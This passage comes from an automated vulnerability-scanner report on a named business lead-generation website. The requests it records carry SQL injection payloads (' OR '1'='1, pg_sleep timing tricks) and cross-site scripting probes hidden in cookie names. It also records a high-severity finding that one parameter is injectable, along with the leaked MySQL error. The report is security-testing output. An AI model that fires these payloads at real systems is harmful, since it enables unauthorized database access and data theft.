OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:37:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=07vpse2umkp91jug8puljprpd2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance10315083'%20or%201%3d2--%20&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=%27)%3BSELECT%20pg_sleep(25)--&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:37:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ef7hgftkl01b81g8c4812j6k65; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Incorporation, Use InsideUp to Get Quotes and Compare Incorporation Vendors </title>
   <meta name="description" content="Let incorporation vendors compete for your incorporation needs. Compare local and national incorporation vendors."/>
   <meta name="keywords" content=" Incorporation "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 7    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr>
            <td width="175" valign="middle">
                <div style="padding-top: 13px; padding-bottom: 7px; padding-
...[SNIP]...

1.440. http://www.insideup.com/ppc/leadflow/inco00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/inco00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='+OR+'1'%3d'1&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:38:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1s1avspaslebij9ge82hin80c2; path=/
Content-Length: 5246
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
eId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=' OR '1'='1&subcategoryId=60003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=' OR '1'='' at line 5

Request 2

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_475=3074__Corporation&attributeId_476_t=3&attributeId_477=3138__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone='+OR+'1'%3d'1&subcategoryId=60003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:38:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=aq267e2sci81s1869l9ool1q77; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

Report generation cancelled at Fri Mar 18 06:27:13 CDT 2011. 1635 issues were not reported.